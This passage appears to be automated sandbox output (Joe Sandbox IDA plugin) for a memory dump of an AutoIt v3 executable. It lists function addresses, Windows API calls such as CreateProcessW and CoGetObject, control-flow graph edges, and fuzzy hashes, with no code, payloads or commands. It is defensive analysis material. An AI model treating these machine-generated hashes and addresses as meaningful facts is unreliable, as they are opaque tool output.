                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                • API String ID: 4192528855-966354055
                                                                                                                                • Opcode ID: fd7285011b281bbbb6be0b080f3f7f2a3e101761f8fd259c36f1df64651e64a0
                                                                                                                                • Instruction ID: b22586b0b84d1aade034e9b062dd5faf7163595ac00f99235a1794f8bb5462c5
                                                                                                                                • Opcode Fuzzy Hash: fd7285011b281bbbb6be0b080f3f7f2a3e101761f8fd259c36f1df64651e64a0
                                                                                                                                • Instruction Fuzzy Hash: 85026C75600611AFCB14EF24C991E6AB7E5FF88720F14845DF88A9B361DB38ED41EB42
                                                                                                                                Function 00F130A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00F130B0
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00F130BF
                                                                                                                                • LoadIconW.USER32(00000063), ref: 00F130D5
                                                                                                                                • LoadIconW.USER32(000000A4), ref: 00F130E7
                                                                                                                                • LoadIconW.USER32(000000A2), ref: 00F130F9
                                                                                                                                  • Part of subcall function 00F1318A: LoadImageW.USER32(00F10000,00000063,00000001,00000010,00000010,00000000), ref: 00F131AE
                                                                                                                                • RegisterClassExW.USER32(?), ref: 00F13167
                                                                                                                                  • Part of subcall function 00F12F58: GetSysColorBrush.USER32(0000000F), ref: 00F12F8B
                                                                                                                                  • Part of subcall function 00F12F58: RegisterClassExW.USER32(00000030), ref: 00F12FB5
                                                                                                                                  • Part of subcall function 00F12F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F12FC6
                                                                                                                                  • Part of subcall function 00F12F58: LoadIconW.USER32(000000A9), ref: 00F13009
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                • API String ID: 2880975755-4155596026
                                                                                                                                • Opcode ID: 23b56baa8c1e26323999e6c2a24514871867605e7c36d29c96b855337ed770ba
                                                                                                                                • Instruction ID: 9dcb50160e43679095f8c14e29414f325eb161ccd1abd14b72c2f54aa044fdb0
                                                                                                                                • Opcode Fuzzy Hash: 23b56baa8c1e26323999e6c2a24514871867605e7c36d29c96b855337ed770ba
                                                                                                                                • Instruction Fuzzy Hash: B02131B1E01308BBDB10DFB9ED49A99BBFAFB48310F10412BE615A22A1D7754580AF91
                                                                                                                                Function 00F6B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1237 f6b74b-f6b7ac VariantInit call f1ca8e CoInitialize 1240 f6b7b4-f6b7c7 call f2d5f6 1237->1240 1241 f6b7ae CoUninitialize 1237->1241 1244 f6b7d5-f6b7dc 1240->1244 1245 f6b7c9-f6b7d0 call f1ca8e 1240->1245 1241->1240 1247 f6b7de-f6b805 call f184a6 call f4a857 1244->1247 1248 f6b81b-f6b85b call f184a6 call f2f885 1244->1248 1245->1244 1247->1248 1259 f6b807-f6b816 call f6c235 1247->1259 1257 f6b9d3-f6ba17 SetErrorMode CoGetInstanceFromFile 1248->1257 1258 f6b861-f6b86e 1248->1258 1262 f6ba1f-f6ba3a CoGetObject 1257->1262 1263 f6ba19-f6ba1d 1257->1263 1260 f6b870-f6b881 call f2d5f6 1258->1260 1261 f6b8a8-f6b8b6 GetRunningObjectTable 1258->1261 1272 f6bad0-f6bae3 VariantClear 1259->1272 1281 f6b883-f6b88d call f1cdb4 1260->1281 1282 f6b8a0 1260->1282 1266 f6b8d5-f6b8e8 call f6c235 1261->1266 1267 f6b8b8-f6b8c9 1261->1267 1270 f6bab5-f6bac5 call f6c235 SetErrorMode 1262->1270 1271 f6ba3c 1262->1271 1269 f6ba40-f6ba47 SetErrorMode 1263->1269 1284 f6bac7-f6bacb call f15cd3 1266->1284 1287 f6b8ed-f6b8fc 1267->1287 1288 f6b8cb-f6b8d0 1267->1288 1276 f6ba4b-f6ba51 1269->1276 1270->1284 1271->1269 1277 f6ba53-f6ba55 1276->1277 1278 f6baa8-f6baab 1276->1278 1285 f6ba57-f6ba78 call f4ac4b 1277->1285 1286 f6ba8d-f6baa6 call f5a6f6 1277->1286 1278->1270 1281->1282 1297 f6b88f-f6b89e call f1cdb4 1281->1297 1282->1261 1284->1272 1285->1286 1298 f6ba7a-f6ba83 1285->1298 1286->1284 1296 f6b907-f6b91b 1287->1296 1288->1266 1303 f6b921-f6b925 1296->1303 1304 f6b9bb-f6b9d1 1296->1304 1297->1261 1298->1286 1303->1304 1305 f6b92b-f6b940 1303->1305 1304->1276 1308 f6b9a2-f6b9ac 1305->1308 1309 f6b942-f6b957 1305->1309 1308->1296 1309->1308 1313 f6b959-f6b983 call f4ac4b 1309->1313 1317 f6b994-f6b99e 1313->1317 1318 f6b985-f6b98d 1313->1318 1317->1308 1319 f6b9b1-f6b9b6 1318->1319 1320 f6b98f-f6b990 1318->1320 1319->1304 1320->1317
                                                                                                                                APIs
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00F6B777
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00F6B7A4
                                                                                                                                • CoUninitialize.COMBASE ref: 00F6B7AE
                                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00F6B8AE
                                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F6B9DB
                                                                                                                                • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00F6BA0F
                                                                                                                                • CoGetObject.OLE32(?,00000000,00F9D91C,?), ref: 00F6BA32
                                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00F6BA45
                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F6BAC5
                                                                                                                                • VariantClear.OLEAUT32(00F9D91C), ref: 00F6BAD5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2395222682-0
                                                                                                                                • Opcode ID: f7d70c60f9b7a81d92451a269030eb8f497cb831c848faa3e40a51367129c592
                                                                                                                                • Instruction ID: 867d84770775a38dc7853dc461457175301687a44107fa6d88d89705b7928585
                                                                                                                                • Opcode Fuzzy Hash: f7d70c60f9b7a81d92451a269030eb8f497cb831c848faa3e40a51367129c592
                                                                                                                                • Instruction Fuzzy Hash: 84C13271608305AFC700DF68C884A6AB7E9FF89318F14491DF98ADB251DB70ED46DB92
                                                                                                                                Function 00F12F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00F12F8B
                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00F12FB5
                                                                                                                                • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F12FC6
                                                                                                                                • LoadIconW.USER32(000000A9), ref: 00F13009
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                • API String ID: 975902462-1005189915
                                                                                                                                • Opcode ID: a3bfc0326da2c89a6198955568eafe06b3272d1ae2a3e4e2cedae66fc9e22420
                                                                                                                                • Instruction ID: d89fabd37a1c0d0de2f8f649b9a98f3ce559d891222417caf9bbc2a45c22fd6a
                                                                                                                                • Opcode Fuzzy Hash: a3bfc0326da2c89a6198955568eafe06b3272d1ae2a3e4e2cedae66fc9e22420
                                                                                                                                • Instruction Fuzzy Hash: D021BDB590131CAFDB50EFA5E989BCEBBB5FB08700F10421AF615A62A0D7B44544EFA1
                                                                                                                                Function 00F723C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1326 f723c5-f72426 call f31970 1329 f72452-f72456 1326->1329 1330 f72428-f7243b call f1cdb4 1326->1330 1332 f7249d-f724a3 1329->1332 1333 f72458-f72468 call f1cdb4 1329->1333 1338 f7243d-f72450 call f1cdb4 1330->1338 1339 f72488 1330->1339 1335 f724a5-f724a8 1332->1335 1336 f724b8-f724be 1332->1336 1348 f7246b-f72484 call f1cdb4 1333->1348 1340 f724ab-f724b0 call f1cdb4 1335->1340 1341 f724c0 1336->1341 1342 f724c8-f724e2 call f184a6 call f13bcf 1336->1342 1338->1348 1344 f7248b-f7248f 1339->1344 1340->1336 1341->1342 1359 f725a1-f725a9 1342->1359 1360 f724e8-f72541 call f184a6 call f13bcf call f184a6 call f13bcf call f184a6 call f13bcf 1342->1360 1349 f72491-f72497 1344->1349 1350 f72499-f7249b 1344->1350 1348->1332 1358 f72486 1348->1358 1349->1340 1350->1332 1350->1336 1358->1344 1362 f725d3-f72601 GetCurrentDirectoryW call f3010a GetCurrentDirectoryW 1359->1362 1363 f725ab-f725c6 call f184a6 call f13bcf 1359->1363 1408 f72543-f7255e call f184a6 call f13bcf 1360->1408 1409 f7256f-f7259f GetSystemDirectoryW call f3010a GetSystemDirectoryW 1360->1409 1371 f72605 1362->1371 1363->1362 1379 f725c8-f725d1 call f318fb 1363->1379 1374 f72609-f7260d 1371->1374 1377 f7260f-f72639 call f1ca8e * 3 1374->1377 1378 f7263e-f7264e call f59a8f 1374->1378 1377->1378 1390 f72650-f7269b call f5a17a call f5a073 call f5a102 1378->1390 1391 f726aa 1378->1391 1379->1362 1379->1378 1393 f726ac-f726bb 1390->1393 1422 f7269d-f726a8 1390->1422 1391->1393 1397 f726c1-f726f1 call f4bc90 call f318fb 1393->1397 1398 f7274c-f72768 CreateProcessW 1393->1398 1423 f726f3-f726f8 1397->1423 1424 f726fa-f7270a call f318fb 1397->1424 1404 f7276b-f7277e call f3017e * 2 1398->1404 1427 f72780-f727b8 call f5d7e4 GetLastError call f17ba9 call f22570 1404->1427 1428 f727bd-f727c9 CloseHandle 1404->1428 1408->1409 1430 f72560-f72569 call f318fb 1408->1430 1409->1371 1422->1393 1423->1423 1423->1424 1434 f72713-f72723 call f318fb 1424->1434 1435 f7270c-f72711 1424->1435 1443 f7283e-f7284f call f59b29 1427->1443 1432 f727f5-f727f9 1428->1432 1433 f727cb-f727f0 call f59d09 call f5a37f call f72881 1428->1433 1430->1374 1430->1409 1437 f72807-f72811 1432->1437 1438 f727fb-f72805 1432->1438 1433->1432 1454 f72725-f7272a 1434->1454 1455 f7272c-f7274a call f3017e * 3 1434->1455 1435->1434 1435->1435 1444 f72813 1437->1444 1445 f72819-f72838 call f22570 CloseHandle 1437->1445 1438->1443 1444->1445 1445->1443 1454->1454 1454->1455 1455->1404
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F723E6
                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F72579
                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F7259D
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F725DD
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F725FF
                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F72760
                                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F72792
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00F727C1
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00F72838
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4090791747-0
                                                                                                                                • Opcode ID: b6bdbbb7ea945c712d80ec51d999fb91b6ee76cb14a9cd10607fd557300a7aae
                                                                                                                                • Instruction ID: eb5ef533744d6b2e0497e18e41905ba2335924084285028c92accc24f89448f2
                                                                                                                                • Opcode Fuzzy Hash: b6bdbbb7ea945c712d80ec51d999fb91b6ee76cb14a9cd10607fd557300a7aae
                                                                                                                                • Instruction Fuzzy Hash: B9D1B131604301DFC715EF24D891B6ABBE1BF85320F14845EF8899B2A2DB35DD45EB52
                                                                                                                                Function 00F6C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1467 f6c8b7-f6c8f1 1468 f6c8f7-f6c8fa 1467->1468 1469 f6ccfb-f6ccff 1467->1469 1468->1469 1470 f6c900-f6c903 1468->1470 1471 f6cd04-f6cd05 1469->1471 1470->1469 1473 f6c909-f6c912 call f6cff8 1470->1473 1472 f6cd06 call f6c235 1471->1472 1476 f6cd0b-f6cd0f 1472->1476 1478 f6c914-f6c920 1473->1478 1479 f6c925-f6c92e call f5be14 1473->1479 1478->1472 1482 f6c934-f6c93a 1479->1482 1483 f6cc61-f6cc6c call f1d2c0 1479->1483 1485 f6c940 1482->1485 1486 f6c93c-f6c93e 1482->1486 1491 f6cc6e-f6cc72 1483->1491 1492 f6cca9-f6ccb4 call f1d2c0 1483->1492 1487 f6c942-f6c94a 1485->1487 1486->1487 1489 f6c950-f6c967 call f4abf3 1487->1489 1490 f6ccec-f6ccf4 1487->1490 1501 f6c973-f6c97f 1489->1501 1502 f6c969-f6c96e 1489->1502 1490->1469 1495 f6cc74-f6cc76 1491->1495 1496 f6cc78 1491->1496 1492->1490 1500 f6ccb6-f6ccba 1492->1500 1499 f6cc7a-f6cc98 call f2d6b4 call f597b6 1495->1499 1496->1499 1521 f6cc99-f6cca7 call f5d7e4 1499->1521 1504 f6ccc0 1500->1504 1505 f6ccbc-f6ccbe 1500->1505 1506 f6c981-f6c98d 1501->1506 1507 f6c9ce-f6c9f9 call f2fa89 1501->1507 1502->1471 1510 f6ccc2-f6ccea call f2d6b4 call f5503c call f22570 1504->1510 1505->1510 1506->1507 1511 f6c98f-f6c99c call f4a8c8 1506->1511 1517 f6c9fb-f6ca16 call f2ac65 1507->1517 1518 f6ca18-f6ca1a 1507->1518 1510->1521 1520 f6c9a1-f6c9a6 1511->1520 1523 f6ca1d-f6ca24 1517->1523 1518->1523 1520->1507 1525 f6c9a8-f6c9af 1520->1525 1521->1476 1528 f6ca26-f6ca30 1523->1528 1529 f6ca52-f6ca59 1523->1529 1531 f6c9b1-f6c9b8 1525->1531 1532 f6c9be-f6c9c5 1525->1532 1534 f6ca32-f6ca48 call f4a25b 1528->1534 1537 f6cadf-f6caec 1529->1537 1538 f6ca5f-f6ca66 1529->1538 1531->1532 1536 f6c9ba 1531->1536 1532->1507 1539 f6c9c7 1532->1539 1551 f6ca4a-f6ca50 1534->1551 1536->1532 1540 f6caee-f6caf8 1537->1540 1541 f6cafb-f6cb28 VariantInit call f31970 1537->1541 1538->1537 1544 f6ca68-f6ca7b 1538->1544 1539->1507 1540->1541 1555 f6cb2d-f6cb30 1541->1555 1556 f6cb2a-f6cb2b 1541->1556 1545 f6ca7c-f6ca84 1544->1545 1548 f6ca86-f6caa3 VariantClear 1545->1548 1549 f6cad1-f6cada 1545->1549 1552 f6caa5-f6cab9 SysAllocString 1548->1552 1553 f6cabc-f6cacc 1548->1553 1549->1545 1554 f6cadc 1549->1554 1551->1529 1552->1553 1553->1549 1557 f6cace 1553->1557 1554->1537 1558 f6cb31-f6cb43 1555->1558 1556->1558 1557->1549 1559 f6cb47-f6cb4c 1558->1559 1560 f6cb4e-f6cb52 1559->1560 1561 f6cb8a-f6cb8c 1559->1561 1562 f6cb54-f6cb86 1560->1562 1563 f6cba1-f6cba5 1560->1563 1564 f6cbb4-f6cbd5 call f5d7e4 call f5a6f6 1561->1564 1565 f6cb8e-f6cb95 1561->1565 1562->1561 1567 f6cba6-f6cbaf call f6c235 1563->1567 1573 f6cc41-f6cc50 VariantClear 1564->1573 1575 f6cbd7-f6cbe0 1564->1575 1565->1563 1566 f6cb97-f6cb9f 1565->1566 1566->1567 1567->1573 1576 f6cc52-f6cc55 call f51693 1573->1576 1577 f6cc5a-f6cc5c 1573->1577 1578 f6cbe2-f6cbef 1575->1578 1576->1577 1577->1476 1580 f6cbf1-f6cbf8 1578->1580 1581 f6cc38-f6cc3f 1578->1581 1582 f6cc26-f6cc2a 1580->1582 1583 f6cbfa-f6cc0a 1580->1583 1581->1573 1581->1578 1585 f6cc30 1582->1585 1586 f6cc2c-f6cc2e 1582->1586 1583->1581 1584 f6cc0c-f6cc14 1583->1584 1584->1582 1587 f6cc16-f6cc1c 1584->1587 1588 f6cc32-f6cc33 call f5a6f6 1585->1588 1586->1588 1587->1582 1589 f6cc1e-f6cc24 1587->1589 1588->1581 1589->1581 1589->1582
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                • API String ID: 0-572801152
                                                                                                                                • Opcode ID: 888604a32995f3493b9027a2c9919b15347befd9a07f37f3b300a10da2282e83
                                                                                                                                • Instruction ID: 2925f7763818ff3dca6add2abe73ee82dff2813e369f6a2696b77d82eb81dbf7
                                                                                                                                • Opcode Fuzzy Hash: 888604a32995f3493b9027a2c9919b15347befd9a07f37f3b300a10da2282e83
                                                                                                                                • Instruction Fuzzy Hash: BDE1B071E00219ABDF10DFA8D891BBE77B5EF48364F148029E9C9AB281D774DD41EB90
                                                                                                                                Function 00F6BF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1591 f6bf80-f6bfe1 call f31970 1594 f6bfe7-f6bfeb 1591->1594 1595 f6c21b-f6c21d 1591->1595 1594->1595 1597 f6bff1-f6bff6 1594->1597 1596 f6c21e-f6c21f 1595->1596 1598 f6c224-f6c226 1596->1598 1597->1595 1599 f6bffc-f6c00b call f5be14 1597->1599 1600 f6c227 1598->1600 1604 f6c011-f6c015 1599->1604 1605 f6c158-f6c15c 1599->1605 1603 f6c229 call f6c235 1600->1603 1611 f6c22e-f6c232 1603->1611 1607 f6c017-f6c019 1604->1607 1608 f6c01b 1604->1608 1609 f6c15e-f6c160 1605->1609 1610 f6c16d 1605->1610 1612 f6c01d-f6c01f 1607->1612 1608->1612 1613 f6c16f-f6c171 1609->1613 1610->1613 1614 f6c033-f6c03e 1612->1614 1615 f6c021-f6c025 1612->1615 1613->1596 1616 f6c177-f6c17b 1613->1616 1614->1600 1615->1614 1619 f6c027-f6c031 1615->1619 1617 f6c181 1616->1617 1618 f6c17d-f6c17f 1616->1618 1620 f6c183-f6c186 1617->1620 1618->1620 1619->1614 1621 f6c043-f6c05f 1619->1621 1622 f6c193-f6c197 1620->1622 1623 f6c188-f6c18e 1620->1623 1628 f6c067-f6c081 1621->1628 1629 f6c061-f6c065 1621->1629 1624 f6c19d 1622->1624 1625 f6c199-f6c19b 1622->1625 1623->1598 1627 f6c19f-f6c1c9 VariantInit VariantClear 1624->1627 1625->1627 1635 f6c1e6-f6c1ea 1627->1635 1636 f6c1cb-f6c1cd 1627->1636 1637 f6c083-f6c087 1628->1637 1638 f6c089 1628->1638 1629->1628 1630 f6c090-f6c0e5 call f2fa89 VariantInit call f31a00 1629->1630 1653 f6c0e7-f6c0f1 1630->1653 1654 f6c108-f6c10d 1630->1654 1640 f6c1f0-f6c1fe call f22570 1635->1640 1641 f6c1ec-f6c1ee 1635->1641 1636->1635 1639 f6c1cf-f6c1e1 call f22570 1636->1639 1637->1630 1637->1638 1638->1630 1652 f6c0fb-f6c0fe 1639->1652 1642 f6c201-f6c219 call f5a6f6 VariantClear 1640->1642 1641->1640 1641->1642 1642->1611 1652->1603 1655 f6c103-f6c106 1653->1655 1656 f6c0f3-f6c0fa 1653->1656 1657 f6c162-f6c16b 1654->1657 1658 f6c10f-f6c131 1654->1658 1655->1652 1656->1652 1657->1652 1661 f6c133-f6c139 1658->1661 1662 f6c13b-f6c13d 1658->1662 1661->1652 1663 f6c141-f6c157 call f5a6f6 1662->1663 1663->1605
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearInit$_memset
                                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                • API String ID: 2862541840-625585964
                                                                                                                                • Opcode ID: e7cb4089c74d1efd2aada0cec97c3c5a0a4274c3725512ca88f3294aee20a0ed
                                                                                                                                • Instruction ID: 426ceb0ad14b285486523f386fa58062653c8086e157412386150455983b1cdd
                                                                                                                                • Opcode Fuzzy Hash: e7cb4089c74d1efd2aada0cec97c3c5a0a4274c3725512ca88f3294aee20a0ed
                                                                                                                                • Instruction Fuzzy Hash: DC919D71E00219ABDF24CFA4CC44FAEBBB8AF45720F108519F995AB281D7709945EFE0
                                                                                                                                Function 00F12E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F12ECB
                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F12EEC
                                                                                                                                • ShowWindow.USER32(00000000), ref: 00F12F00
                                                                                                                                • ShowWindow.USER32(00000000), ref: 00F12F09
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
